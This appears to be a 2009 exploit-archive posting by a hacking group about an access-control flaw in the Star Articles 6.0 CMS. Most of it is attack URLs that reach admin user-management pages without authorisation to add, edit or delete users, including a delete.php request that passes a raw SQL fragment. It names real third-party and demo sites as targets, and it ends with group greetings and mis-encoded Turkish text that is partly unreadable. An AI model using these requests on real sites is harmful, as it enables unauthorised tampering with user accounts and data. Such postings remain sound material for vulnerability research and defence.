[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Star Articles 6.0 (admin.manage) Remote Contents Change Vulnerability
# Published : 2009-01-29
# Author : ByALBAYX
# Previous Title : Personal Site Manager <= 0.3 Remote Command Execution Exploit
# Next Title : Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability
#############################################
#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author : ByALBAYX
[~]Website : WWW.C4TEAM.ORG
#############################################
[~]Script :Star Articles 6.0
[~]Site :http://www.stararticles.com
[~]Download :http://cmsnx.com/psf/order.php?id=5
[~]$ :(175$)
#############################################
[~]http://www.c4team.org/ [PATH] /stararticle/user.modify.profile.php?userid=1
[~]Add
[~]http://www.c4team.org/ [PATH]/ user.registration.php?redirect=admin.manage.users.php
[~]http://webrepairdoctor.co.uk/user.registration.php?redirect=admin.manage.users.php
[~]Edit
[~]http://www.c4team.org/ [PATH]/admin.edit.user.php?id=1
[~]http://webrepairdoctor.co.uk/admin.edit.user.php?id=1
[~]Delete
[~]http://www.c4team.org/ [PATH] /delete.php?id=5&heading=User&sql=star_users where id &redirect=admin.manage.users.php
[~]http://webrepairdoctor.co.uk/delete.php?id=5&heading=User&sql=star_users where id &redirect=admin.manage.users.php
vs...
[~]....Ver Ayar?? :=)
[~]Demo : http://www.kalptarudemos.com/demo/stararticle/admin.manage.users.php
[~]Demo : http://www.kalptarudemos.com/demo/stararticle/user.modify.profile.php?userid=1
#############################################
[~]????inize Baq??n :=)
[~]Greetz For C4TEAM Members
[~]Bu isko ne g??tler sikmi?? :D Millet k???§??k iskonun tad??n?? unutam??yor :D :D
#############################################
Derdimi dinledim, derdimden ????REND??M...
Onun derdini g??rd??m, derdime ??MREND??M...
FilistiN
----------
# www.Syue.com [2009-01-29]